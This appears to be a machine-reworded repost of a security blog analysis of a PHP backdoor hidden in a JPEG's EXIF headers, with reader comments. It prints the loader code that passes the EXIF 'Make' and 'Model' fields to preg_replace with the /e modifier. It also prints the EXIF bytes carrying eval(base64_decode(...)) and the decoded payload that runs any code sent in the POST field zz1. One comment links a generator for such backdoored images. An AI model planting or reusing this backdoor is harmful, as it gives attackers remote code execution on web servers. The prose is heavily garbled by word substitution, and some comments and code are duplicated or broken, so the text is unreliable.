A few days ago, Peter Gramantik from our
research team constitute a real interesting backdoor on a compromised site. This backdoor didn’t rely on the normal patterns to cover its content (like base64/gzip encoding), but stored its information inwards the EXIF headers of a JPEG image. It also used the exif_read_data as well as preg_replace PHP functions to read the headers as well as execute itself.
Technical Details
The backdoor is divided into 2 parts. The commencement part is a mix of the exif_read_data role to read the paradigm headers as well as the preg_replace role to execute the content. This is what nosotros constitute inwards the compromised site:
$exif = exif_read_data('/homepages/clientsitepath/images/stories/food/bun.jpg'); preg_replace($exif['Make'],$exif['Model'],'');
Both functions are harmless yesteryear themselves. Exif_read_data is commonly used to read images as well as preg_replace to supervene upon the content of strings. However, preg_replace has a hidden as well as tricky pick where if you lot overstep the “/e” modifier it volition execute the content (eval), instead of simply searching/replacing.
When nosotros expression at the bun.jpg file, nosotros discovery the minute part of the backdoor:
ÿØÿà^@^PJFIF^@^A^B^@^@d^@d^@^@ÿá^@¡Exif^@^@II*^@ ^H^@^@^@^B^@^O^A^B^@^F^@^@^@&^@^@^@^P^A^B^@m^@^@^@,^@^@^@^@^@^@^@/.*/e^ @ eval ( base64_decode("aWYgKGl zc2V0KCRfUE9TVFsie noxIl0pKSB7ZXZhbChzd HJpcHNsYXNoZXMoJF9QT1NUWyJ6ejEiXSkpO30=')); @ÿì^@^QDucky^@^A^@^D^@^@^@<^@^@ÿî^@^NAdobe^
The file starts unremarkably amongst the mutual headers, but inwards the "Make" header it has a foreign keyword: "/.*/e". That's the exact modifier used yesteryear preg_replace to execute (eval) whatever is passed to it.
Now things are getting interesting...
If nosotros proceed looking at the EXIF data, nosotros tin encounter the "eval ( base64_decode" hidden within the "Model" header. When you lot pose it all together, nosotros tin encounter what is going on. The attackers are reading both the Maker as well as Model header from the EXIF as well as filling the preg_replace amongst them. Once nosotros modify the $exif['Make'] as well as $exif['Model'] for what is inwards the file, nosotros acquire the in conclusion backdoor:
preg_replace ("/.*/e", ,"@ eval ( base64_decode("aWYgKGl ...");
Once decoded, nosotros tin encounter that it simply executes whatever content is provided yesteryear the POST variable zz1. The total decoded backdoor is
here:
if (isset( $_POST["zz1"])) { eval (stripslashes( $_POST["zz1"]..
Steganography Malware
Another interesting hollo for is that bun.jpg as well as other images that were compromised, all the same charge as well as piece of work properly. In fact, on these compromised sites, the attackers modified a legit, pre-existent paradigm from the site. This is a curious steganographic means to cover the malware.
Note: Any of Sucuri clients using
Server Side Scanning are protected against this type of injection (detected yesteryear us).
I appreciate all the difficult enquiry concerning this shape of laid on to a server, but at that spot are working examples of the code demonstrating how it works, this is all the same all theory. What I receive got constitute is at that spot are a lot of posts describing this (theoretical) laid on but until I tin attempt out this out on my electrical current server to encounter if at that spot is a safety flaw I volition conclude that this is all it is.
I receive got constitute several paradigm files amongst the EXIF modified amongst the PHP code, as well as I receive got also constitute several on the site I host amongst the obfuscation, but I am yet to empathise how 1. They contrary the obfuscation without having a script to contrary it, as well as 2. How they brand a telephone telephone to the EXIF coding as well as run the script.
This may hold upward my issue, but each file I receive got discovered uploaded to my site amongst these modifications, I receive got as well as so taken them as well as used a attempt out bed server to encounter if I could run the code from the browser yesteryear accessing the paradigm file straight yesteryear using the gif extension or changing it to php.
On all my tests, I receive got non been able to replicate what everyone is talking about. This tells me that at that spot has to hold upward a high degree of coding for the site that assumes many features are turned on or fifty-fifty installed on the Linux server.
Again, I appreciate the post, as well as the theoretical fighting on how this could happen, as well as should happen, but without detailed examples showing this is possible it is cipher to a greater extent than than a potential threat as well as cipher more.
#############################
I appreciate all the difficult enquiry concerning this shape of laid on to a server, but at that spot are working examples of the code demonstrating how it works, this is all the same all theory. What I receive got constitute is at that spot are a lot of posts describing this (theoretical) laid on but until I tin attempt out this out on my electrical current server to encounter if at that spot is a safety flaw I volition conclude that this is all it is.
I receive got constitute several paradigm files amongst the EXIF modified amongst the PHP code, as well as I receive got also constitute several on the site I host amongst the obfuscation, but I am yet to empathise how 1. They contrary the obfuscation without having a script to contrary it, as well as 2. How they brand a telephone telephone to the EXIF coding as well as run the script.
This may hold upward my issue, but each file I receive got discovered uploaded to my site amongst these modifications, I receive got as well as so taken them as well as used a attempt out bed server to encounter if I could run the code from the browser yesteryear accessing the paradigm file straight yesteryear using the gif extension or changing it to php.
On all my tests, I receive got non been able to replicate what everyone is talking about. This tells me that at that spot has to hold upward a high degree of coding for the site that assumes many features are turned on or fifty-fifty installed on the Linux server.
Again, I appreciate the post, as well as the theoretical fighting on how this could happen, as well as should happen, but without detailed examples showing this is possible it is cipher to a greater extent than than a potential threat as well as cipher more.
###########
exiv2 -d e bun.jpg
removes EXIF Metadata from the image.
#######
Hello guys,
I wrote a particular tool that practise custom paradigm amongst EXIF backdoored but the divergence betwixt your finding as well as out tool plant is that the futurity shellcode is obfuscated a lilliputian as well as and so is stored. Does your AV notice this or is based on base64 as well as eval combinations?
You tin attempt out yesteryear yourself :
https://github.com/CCSIR/PHP-EXIF-Backdoors-generator-using-custom-shellcode #########
We've been seeing this inwards our IPS from users hitting diverse external websites. It's simply triggering on 'base64_decode' inwards the .jpg. When I decoded it, as well as googled, I got this post. So all our alarm is indicating is a compromised webserver on the internet, non malicious activeness against our internal users?
Sanitising the inputs wouldn't receive got helped since the assailant could simply disable that part of the code. The primary interesting thing inwards this laid on is the usage of a little-used pick to brand a seemingly innocuous telephone telephone to preg_replace execute code. However, having a difficult coded path to an paradigm is odd as well as would in all likelihood describe attending to that part of the code.
real overnice article I learned a lot from it include a few methods(for e.base64 vulnerable,gzip,HTTP compression etc...) I had learned a lot to a greater extent than than the theory himself Thanks
Couldnt this method also hold upward used to tunnel through "next generation firewalls"?
That is every bit presently every bit the firewall admin allows the customer to browse the mesh (using http), fifty-fifty if diverse http-tunnel techniques volition hold upward blocked this ane volition overstep since jpegs would of course of teaching hold upward allowed to hold upward downloaded through http (aswell every bit POSTed dorsum to the server which is running the tunneling client)?
I don't acquire it... solely sites compromised, where the assailant tin modify the php codes are vulnerable... so he tin pose whatever he wants to execute code inwards the root code... fifty-fifty a system()... this is a real localized vulnerability...
Sorry for beingness a consummate n00b. Do you lot hateful to say that the malware ridden paradigm was uploaded to a site that allowed execution as well as thus providing a backdoor for the attacker?
As stated yesteryear others there's no argue this can't extended to hiding code anywhere, inwards whatsoever type of file that is valid, similar the PNG format inwards the "iTXt", "tEXt", or slightly to a greater extent than insidious "zTXt" chunks of a PNG file, hidden inwards a good format current etc etc.
Interesting means to cover your payload code. I suppose if at that spot was some file integrity checking (a la tripwire/aide) on the organization inwards query hosting the moving-picture exhibit it *might* receive got raised flags, but fifty-fifty a .jpg tin hold upward expected to alter on a website so it powerfulness escape the cursory glance of a nightly report.
Not beingness terribly PHP savvy, the hosted moving-picture exhibit wouldn't receive got to hold upward on the same host, but hosted elsewhere as well as loaded through a URL call.. Even that could escape a nightly report, amongst some dev's loading offsite code similar jQuery..
Probably the solely existent protection piece using PHP would hold upward to disable some functions, similar eval or preg_*() via php.ini or usage the hardened PHP Project, Suhosin, which does take the e from preg*
Also I wonder how many IDS/IPS systems out at that spot would warn that the jpg/jpeg that simply flashed yesteryear on the wire contained something odd inwards its EXIF surface area (or for that affair every bit you lot mentioned a png file containing materials inwards the iTXt, tEXt or zTXt)?
I mean value it would hold upward difficult to do, because the organization would receive got to examine every information stream, as well as would probable receive got a decent surgical physical care for striking attempting to practise that (not everything is patently text code, compressed compaction code, etc).
I suppose the sentiment is the IPS/IDS would notice the intrusion (if properly configured) earlier the dark lid inwards query has a adventure to modify a organization earlier pulling downward the payload. There's simply also many ways to cover one.However there's e'er a breadcrumb trail to follow if you lot know how as well as where to look.
The postal service leaves a lilliputian ambiguity on the attack. Influenza A virus subtype H5N1 lot of people leaving comments seem to mean value this is some injection attack.
From my take, this is a backdoor. I receive got it the assailant already had access to the organization (from another vulnerability) as well as replaced the bun.jpg amongst the modified EXIF headers. The assailant also pose the PHP code into some root where it's executed. This allows the assailant to number organization commands remotely at whatsoever time. Even later on they acre his initial entry-point.
Daniel Cid is this accurate? Or did the assailant magically know (this powerfulness receive got been an open-source application) that preg_replace is used this way?
Yes, 100% accurate. It is a backdoor added later on the attackers got access to the site.
To hold upward honest the EXIF headers are to a greater extent than or less irrelevant hither - the input could hold upward from anything. The occupation is using preg_replace amongst untrusted input, although I should in all likelihood blame both whoever wrote that code as well as PHP itself for making it so slow to shoot yourself inwards the foot.
Should hold upward clear that it's bad to overstep untrusted input into the commencement parameter of preg_replace. We routinely practise something similar preg_replace("[^a-zA-Z0-9]", "", $_REQUEST['param']) to build clean user input.
p.s. With keen power, comes keen responsibility.